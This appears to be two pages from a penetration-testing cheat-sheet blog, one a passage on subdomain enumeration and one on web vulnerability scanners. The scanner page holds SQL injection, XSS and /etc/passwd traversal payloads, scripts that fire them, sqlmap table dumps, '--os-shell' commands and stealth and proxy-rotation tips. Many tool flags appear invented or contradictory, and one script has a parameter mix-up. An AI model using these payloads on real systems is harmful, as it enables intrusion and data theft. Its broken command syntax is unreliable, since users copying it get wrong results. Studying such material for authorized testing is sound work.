dnsrecon -d TARGET_DOMAIN -t all # With brute force dnsrecon -d TARGET_DOMAIN -b # With wordlist dnsrecon -d TARGET_DOMAIN -w wordlist.txt Fierce Basic Subdomain Enumeration # Basic subdomain enumeration fierce -dns TARGET_DOMAIN # With multiple domains fierce -dns TARGET_DOMAIN1,TARGET_DOMAIN2 # With output file fierce -dns TARGET_DOMAIN -file results.txt # With verbose output fierce -dns TARGET_DOMAIN -verbose # With threads fierce -dns TARGET_DOMAIN -threads 50 # With timeout fierce -dns TARGET_DOMAIN -timeout 10 # With wordlist fierce -dns TARGET_DOMAIN -wordlist wordlist.txt # With range fierce -dns TARGET_DOMAIN -range 192.168.1.0/24 # With delay fierce -dns TARGET_DOMAIN -delay 1 DNSenum Basic DNS Enumeration # Basic DNS enumeration dnsenum TARGET_DOMAIN # With multiple domains dnsenum TARGET_DOMAIN1 TARGET_DOMAIN2 # With output file dnsenum TARGET_DOMAIN -o results.txt # With verbose output dnsenum TARGET_DOMAIN -v # With threads dnsenum TARGET_DOMAIN -t 50 # With timeout dnsenum TARGET_DOMAIN -t 10 # With wordlist dnsenum TARGET_DOMAIN -w wordlist.txt # With range dnsenum TARGET_DOMAIN -r 192.168.1.0/24 # With delay dnsenum TARGET_DOMAIN -d 1 Custom Scripts Python Subdomain Enumeration import requests import threading import queue import time import dns.resolver def subdomain_enumeration(domain, wordlist, threads=10, delay=0): def worker(): while True: try: subdomain = wordlist.get() if subdomain is None: break full_domain = f"{subdomain}.{domain}" # DNS resolution try: dns.resolver.resolve(full_domain, 'A') print(f"[DNS] {full_domain}") except: pass # HTTP check try: response = requests.get(f"http://{full_domain}", timeout=5) print(f"[HTTP] {full_domain} - {response.status_code}") except: pass # HTTPS check try: response = requests.get(f"https://{full_domain}", timeout=5) print(f"[HTTPS] {full_domain} - {response.status_code}") except: pass time.sleep(delay) except Exception as e: pass finally: wordlist.task_done() # Start threads for i in range(threads): t = threading.Thread(target=worker) t.daemon = True t.start() # Add subdomains to queue with open(wordlist_file, 'r') as f: for line in f: wordlist.put(line.strip()) # Wait for completion wordlist.join() # Usage domain = "TARGET_DOMAIN" wordlist_file = "/usr/share/wordlists/subdomains.txt" wordlist = queue.Queue() subdomain_enumeration(domain, wordlist, threads=20, delay=0.1) Bash Subdomain Enumeration #!/bin/bash DOMAIN="TARGET_DOMAIN" WORDLIST="/usr/share/wordlists/subdomains.txt" THREADS=10 # Function to check subdomain check_subdomain() { local subdomain=$1 local full_domain="${subdomain}.${DOMAIN}" # DNS resolution if nslookup "$full_domain" > /dev/null 2>&1; then echo "[DNS] $full_domain" fi # HTTP check if curl -s -o /dev/null -w "%{http_code}" "http://$full_domain" | grep -q "200\|301\|302\|403\|401"; then echo "[HTTP] $full_domain" fi # HTTPS check if curl -s -o /dev/null -w "%{http_code}" "https://$full_domain" | grep -q "200\|301\|302\|403\|401"; then echo "[HTTPS] $full_domain" fi } # Export function for parallel export -f check_subdomain export DOMAIN # Run parallel subdomain check cat "$WORDLIST" | parallel -j "$THREADS" check_subdomain {} Wordlists Common Subdomain Wordlists # SecLists subdomain wordlists /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt /usr/share/wordlists/SecLists/Discovery/DNS/dns-Jhaddix.txt # Custom subdomain wordlists /usr/share/wordlists/custom/subdomains.txt /usr/share/wordlists/custom/api-subdomains.txt /usr/share/wordlists/custom/admin-subdomains.txt # Generate custom wordlists echo "www,mail,ftp,admin,api,dev,test,staging,prod" | tr ',' '\n' > custom_subdomains.txt Creating Custom Wordlists # Extract subdomains from certificate transparency logs curl -s "https://crt.sh/?q=%.TARGET_DOMAIN&output=json" | jq -r '.[].name_value' | sort -u > crt_subdomains.txt # Extract subdomains from DNS records dig @8.8.8.8 TARGET_DOMAIN ANY | grep -oP 'IN\s+\w+\s+\K[^\s]+' | sort -u > dns_subdomains.txt # Combine multiple wordlists cat wordlist1.txt wordlist2.txt wordlist3.txt | sort -u > combined_wordlist.txt # Remove empty lines and duplicates grep -v '^$' wordlist.txt | sort -u > clean_wordlist.txt API-based Enumeration Shodan API # Using Shodan CLI shodan domain TARGET_DOMAIN # Using Shodan API curl -s "https://api.shodan.io/dns/domain/TARGET_DOMAIN?key=YOUR_API_KEY" | jq -r '.data[].subdomain' | sort -u Censys API # Using Censys API curl -s "https://censys.io/api/v1/search/certificates" \ -H "Authorization: Basic YOUR_API_KEY" \ -d '{"query": "TARGET_DOMAIN", "fields": ["parsed.names"]}' | jq -r '.result.hits[].parsed.names[]' | sort -u VirusTotal API # Using VirusTotal API curl -s "https://www.virustotal.com/vtapi/v2/domain/report" \ -d "apikey=YOUR_API_KEY" \ -d "domain=TARGET_DOMAIN" | jq -r '.subdomains[]' | sort -u Passive vs Active Enumeration Passive Enumeration # Using only passive sources subfinder -d TARGET_DOMAIN -sources crtsh,passivetotal,shodan # Using only passive DNS dnsrecon -d TARGET_DOMAIN -t A,AAAA,CNAME,MX,NS,SOA,TXT # Using only certificate transparency curl -s "https://crt.sh/?q=%.TARGET_DOMAIN&output=json" | jq -r '.[].name_value' | sort -u Active Enumeration # Using brute force amass enum -d TARGET_DOMAIN -brute # Using wordlist subfinder -d TARGET_DOMAIN -w wordlist.txt # Using recursive enumeration subfinder -d TARGET_DOMAIN -recursive Best Practices Rate Limiting # Add delay between requests subfinder -d TARGET_DOMAIN -rate-limit 100 # Use fewer threads subfinder -d TARGET_DOMAIN -t 10 # Use proxy rotation subfinder -d TARGET_DOMAIN -proxy http://proxy1:8080 Stealth Mode # Use random user agents subfinder -d TARGET_DOMAIN -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # Use realistic delays subfinder -d TARGET_DOMAIN -rate-limit 50 # Use smaller wordlists subfinder -d TARGET_DOMAIN -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt Output Analysis # Save results to file subfinder -d TARGET_DOMAIN -o results.txt # Filter by status code grep "200" results.txt grep "403" results.txt grep "301\|302" results.txt # Sort by response size sort -k3 -n results.txt Troubleshooting Common Issues # Connection timeout subfinder -d TARGET_DOMAIN -t 5 # Too many requests subfinder -d TARGET_DOMAIN -rate-limit 50 # Invalid SSL certificate subfinder -d TARGET_DOMAIN -k # Authentication required subfinder -d TARGET_DOMAIN -u admin -p password Performance Optimization # Use appropriate thread count subfinder -d TARGET_DOMAIN -t 20 # Use smaller wordlists for initial scan subfinder -d TARGET_DOMAIN -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt # Use specific sources subfinder -d TARGET_DOMAIN -sources crtsh,passivetotal Legal and Ethical Considerations Always obtain proper authorization before testing Respect rate limits and server resources Use appropriate wordlists for the target Document findings properly Follow responsible disclosure practices

1월 10, 2025 · 7 분

Vulnerability Scanner Tools

Vulnerability Scanner Tools Comprehensive collection of web application vulnerability scanner tools and techniques for security testing. Nikto Basic Vulnerability Scanning # Basic vulnerability scan nikto -h http://TARGET_URL # With HTTPS nikto -h https://TARGET_URL # With specific port nikto -h http://TARGET_URL -p 8080 # With multiple hosts nikto -h http://TARGET_URL1,http://TARGET_URL2 # With output file nikto -h http://TARGET_URL -o results.txt # With XML output nikto -h http://TARGET_URL -Format xml -o results.xml # With JSON output nikto -h http://TARGET_URL -Format json -o results.json # With verbose output nikto -h http://TARGET_URL -v # With silent output nikto -h http://TARGET_URL -s Advanced Nikto Options # With specific plugins nikto -h http://TARGET_URL -Plugins "apacheusers,backdoors" # With all plugins nikto -h http://TARGET_URL -Plugins all # With exclude plugins nikto -h http://TARGET_URL -Plugins "apacheusers,backdoors" -exclude "apacheusers" # With custom user agent nikto -h http://TARGET_URL -useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # With cookies nikto -h http://TARGET_URL -C "PHPSESSID=abc123" # With authentication nikto -h http://TARGET_URL -id admin:password # With proxy nikto -h http://TARGET_URL -useproxy http://127.0.0.1:8080 # With timeout nikto -h http://TARGET_URL -timeout 10 # With retries nikto -h http://TARGET_URL -retries 3 # With SSL options nikto -h https://TARGET_URL -ssl -nossl # With specific checks nikto -h http://TARGET_URL -Tuning 1,2,3,4,5,6,7,8,9,0,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z Wapiti Basic Vulnerability Scanning # Basic vulnerability scan wapiti -u http://TARGET_URL # With HTTPS wapiti -u https://TARGET_URL # With specific port wapiti -u http://TARGET_URL:8080 # With output file wapiti -u http://TARGET_URL -o results.txt # With XML output wapiti -u http://TARGET_URL -f xml -o results.xml # With JSON output wapiti -u http://TARGET_URL -f json -o results.json # With verbose output wapiti -u http://TARGET_URL -v # With silent output wapiti -u http://TARGET_URL -s Advanced Wapiti Options # With specific modules wapiti -u http://TARGET_URL -m "sql,xss,file,exec,ssrf" # With all modules wapiti -u http://TARGET_URL -m all # With exclude modules wapiti -u http://TARGET_URL -m "sql,xss,file,exec,ssrf" -e "sql" # With custom user agent wapiti -u http://TARGET_URL -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # With cookies wapiti -u http://TARGET_URL -c "PHPSESSID=abc123" # With authentication wapiti -u http://TARGET_URL -a admin:password # With proxy wapiti -u http://TARGET_URL -p http://127.0.0.1:8080 # With timeout wapiti -u http://TARGET_URL -t 10 # With retries wapiti -u http://TARGET_URL -r 3 # With SSL options wapiti -u https://TARGET_URL -k # With specific checks wapiti -u http://TARGET_URL -c "PHPSESSID=abc123" -a "Mozilla/5.0" Nuclei Basic Vulnerability Scanning # Basic vulnerability scan nuclei -u http://TARGET_URL # With HTTPS nuclei -u https://TARGET_URL # With specific port nuclei -u http://TARGET_URL:8080 # With multiple targets nuclei -l targets.txt # With output file nuclei -u http://TARGET_URL -o results.txt # With JSON output nuclei -u http://TARGET_URL -json -o results.json # With verbose output nuclei -u http://TARGET_URL -v # With silent output nuclei -u http://TARGET_URL -silent Advanced Nuclei Options # With specific templates nuclei -u http://TARGET_URL -t templates/sql-injection.yaml # With all templates nuclei -u http://TARGET_URL -t templates/ # With exclude templates nuclei -u http://TARGET_URL -t templates/ -exclude-templates templates/sql-injection.yaml # With custom user agent nuclei -u http://TARGET_URL -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # With cookies nuclei -u http://TARGET_URL -H "Cookie: PHPSESSID=abc123" # With authentication nuclei -u http://TARGET_URL -H "Authorization: Basic YWRtaW46cGFzc3dvcmQ=" # With proxy nuclei -u http://TARGET_URL -proxy http://127.0.0.1:8080 # With timeout nuclei -u http://TARGET_URL -timeout 10 # With retries nuclei -u http://TARGET_URL -retries 3 # With SSL options nuclei -u https://TARGET_URL -k # With specific checks nuclei -u http://TARGET_URL -t templates/sql-injection.yaml -t templates/xss.yaml OWASP ZAP Basic Vulnerability Scanning # Basic vulnerability scan zap-baseline.py -t http://TARGET_URL # With HTTPS zap-baseline.py -t https://TARGET_URL # With specific port zap-baseline.py -t http://TARGET_URL:8080 # With output file zap-baseline.py -t http://TARGET_URL -r results.html # With XML output zap-baseline.py -t http://TARGET_URL -x results.xml # With JSON output zap-baseline.py -t http://TARGET_URL -J results.json # With verbose output zap-baseline.py -t http://TARGET_URL -v # With silent output zap-baseline.py -t http://TARGET_URL -s Advanced OWASP ZAP Options # With specific policies zap-baseline.py -t http://TARGET_URL -P policy.xml # With all policies zap-baseline.py -t http://TARGET_URL -P all # With exclude policies zap-baseline.py -t http://TARGET_URL -P policy.xml -e "sql-injection,xss" # With custom user agent zap-baseline.py -t http://TARGET_URL -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # With cookies zap-baseline.py -t http://TARGET_URL -c "PHPSESSID=abc123" # With authentication zap-baseline.py -t http://TARGET_URL -u admin:password # With proxy zap-baseline.py -t http://TARGET_URL -p http://127.0.0.1:8080 # With timeout zap-baseline.py -t http://TARGET_URL -T 10 # With retries zap-baseline.py -t http://TARGET_URL -R 3 # With SSL options zap-baseline.py -t https://TARGET_URL -k # With specific checks zap-baseline.py -t http://TARGET_URL -P policy.xml -e "sql-injection,xss" Custom Scripts Python Vulnerability Scanner import requests import threading import queue import time import re def vulnerability_scanner(url, wordlist, threads=10, delay=0): def worker(): while True: try: path = wordlist.get() if path is None: break full_url = url.rstrip('/') + '/' + path.strip() # SQL Injection check sql_payloads = ["'", "\"", "';", "\";", "' OR 1=1--", "\" OR 1=1--"] for payload in sql_payloads: test_url = full_url + "?id=" + payload response = requests.get(test_url, timeout=5) if "error" in response.text.lower() or "mysql" in response.text.lower(): print(f"[SQL Injection] {test_url}") # XSS check xss_payloads = ["<script>alert('XSS')</script>", "<img src=x onerror=alert('XSS')>"] for payload in xss_payloads: test_url = full_url + "?search=" + payload response = requests.get(test_url, timeout=5) if payload in response.text: print(f"[XSS] {test_url}") # Directory traversal check traversal_payloads = ["../", "..\\", "....//", "....\\\\"] for payload in traversal_payloads: test_url = full_url + "?file=" + payload + "etc/passwd" response = requests.get(test_url, timeout=5) if "root:" in response.text: print(f"[Directory Traversal] {test_url}") time.sleep(delay) except Exception as e: pass finally: wordlist.task_done() # Start threads for i in range(threads): t = threading.Thread(target=worker) t.daemon = True t.start() # Add paths to queue with open(wordlist_file, 'r') as f: for line in f: wordlist.put(line.strip()) # Wait for completion wordlist.join() # Usage url = "http://TARGET_URL" wordlist_file = "/usr/share/wordlists/dirb/common.txt" wordlist = queue.Queue() vulnerability_scanner(url, wordlist, threads=20, delay=0.1) Bash Vulnerability Scanner #!/bin/bash TARGET_URL="http://TARGET_URL" WORDLIST="/usr/share/wordlists/dirb/common.txt" THREADS=10 # Function to check vulnerabilities check_vulnerabilities() { local path=$1 local full_url="${TARGET_URL}/${path}" # SQL Injection check sql_payloads=("'" "\"" "';" "\";" "' OR 1=1--" "\" OR 1=1--") for payload in "${sql_payloads[@]}"; do test_url="${full_url}?id=${payload}" response=$(curl -s "$test_url") if echo "$response" | grep -qi "error\|mysql"; then echo "[SQL Injection] $test_url" fi done # XSS check xss_payloads=("<script>alert('XSS')</script>" "<img src=x onerror=alert('XSS')>") for payload in "${xss_payloads[@]}"; do test_url="${full_url}?search=${payload}" response=$(curl -s "$test_url") if echo "$response" | grep -q "$payload"; then echo "[XSS] $test_url" fi done # Directory traversal check traversal_payloads=("../" "..\\" "....//" "....\\\\") for payload in "${traversal_payloads[@]}"; do test_url="${full_url}?file=${payload}etc/passwd" response=$(curl -s "$test_url") if echo "$response" | grep -q "root:"; then echo "[Directory Traversal] $test_url" fi done } # Export function for parallel export -f check_vulnerabilities export TARGET_URL # Run parallel vulnerability check cat "$WORDLIST" | parallel -j "$THREADS" check_vulnerabilities {} Vulnerability Types SQL Injection # Basic SQL injection test sqlmap -u "http://TARGET_URL/page.php?id=1" # With POST data sqlmap -u "http://TARGET_URL/login.php" --data="username=admin&password=admin" # With cookies sqlmap -u "http://TARGET_URL/page.php?id=1" --cookie="PHPSESSID=abc123" # With headers sqlmap -u "http://TARGET_URL/page.php?id=1" --headers="User-Agent: CustomAgent" # With proxy sqlmap -u "http://TARGET_URL/page.php?id=1" --proxy="http://127.0.0.1:8080" # With authentication sqlmap -u "http://TARGET_URL/page.php?id=1" --auth-type=basic --auth-cred="admin:password" # With database enumeration sqlmap -u "http://TARGET_URL/page.php?id=1" --dbs sqlmap -u "http://TARGET_URL/page.php?id=1" --tables sqlmap -u "http://TARGET_URL/page.php?id=1" --columns -T users sqlmap -u "http://TARGET_URL/page.php?id=1" --dump -T users # With OS shell sqlmap -u "http://TARGET_URL/page.php?id=1" --os-shell XSS (Cross-Site Scripting) # Basic XSS test xsser -u "http://TARGET_URL/page.php?search=test" # With POST data xsser -u "http://TARGET_URL/login.php" --data="username=admin&password=admin" # With cookies xsser -u "http://TARGET_URL/page.php?search=test" --cookie="PHPSESSID=abc123" # With headers xsser -u "http://TARGET_URL/page.php?search=test" --headers="User-Agent: CustomAgent" # With proxy xsser -u "http://TARGET_URL/page.php?search=test" --proxy="http://127.0.0.1:8080" # With authentication xsser -u "http://TARGET_URL/page.php?search=test" --auth="admin:password" # With payloads xsser -u "http://TARGET_URL/page.php?search=test" --payload="<script>alert('XSS')</script>" # With encoding xsser -u "http://TARGET_URL/page.php?search=test" --encode Command Injection # Basic command injection test commix -u "http://TARGET_URL/page.php?cmd=test" # With POST data commix -u "http://TARGET_URL/login.php" --data="username=admin&password=admin" # With cookies commix -u "http://TARGET_URL/page.php?cmd=test" --cookie="PHPSESSID=abc123" # With headers commix -u "http://TARGET_URL/page.php?cmd=test" --headers="User-Agent: CustomAgent" # With proxy commix -u "http://TARGET_URL/page.php?cmd=test" --proxy="http://127.0.0.1:8080" # With authentication commix -u "http://TARGET_URL/page.php?cmd=test" --auth="admin:password" # With OS shell commix -u "http://TARGET_URL/page.php?cmd=test" --os-shell Best Practices Rate Limiting # Add delay between requests nikto -h http://TARGET_URL -timeout 10 # Use fewer threads nuclei -u http://TARGET_URL -t 10 # Use proxy rotation nuclei -u http://TARGET_URL -proxy http://proxy1:8080 Stealth Mode # Use random user agents nikto -h http://TARGET_URL -useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # Use realistic delays nuclei -u http://TARGET_URL -rate-limit 50 # Use smaller wordlists nuclei -u http://TARGET_URL -t templates/sql-injection.yaml Output Analysis # Save results to file nikto -h http://TARGET_URL -o results.txt # Filter by severity grep "HIGH" results.txt grep "MEDIUM" results.txt grep "LOW" results.txt # Sort by vulnerability type grep "SQL Injection" results.txt grep "XSS" results.txt grep "Command Injection" results.txt Troubleshooting Common Issues # Connection timeout nikto -h http://TARGET_URL -timeout 30 # Too many requests nuclei -u http://TARGET_URL -rate-limit 50 # Invalid SSL certificate nuclei -u https://TARGET_URL -k # Authentication required nuclei -u http://TARGET_URL -H "Authorization: Basic YWRtaW46cGFzc3dvcmQ=" Performance Optimization # Use appropriate thread count nuclei -u http://TARGET_URL -t 20 # Use smaller wordlists for initial scan nuclei -u http://TARGET_URL -t templates/sql-injection.yaml # Use specific templates nuclei -u http://TARGET_URL -t templates/sql-injection.yaml -t templates/xss.yaml Legal and Ethical Considerations Always obtain proper authorization before testing Respect rate limits and server resources Use appropriate tools for the target Document findings properly Follow responsible disclosure practices

1월 10, 2025 · 7 분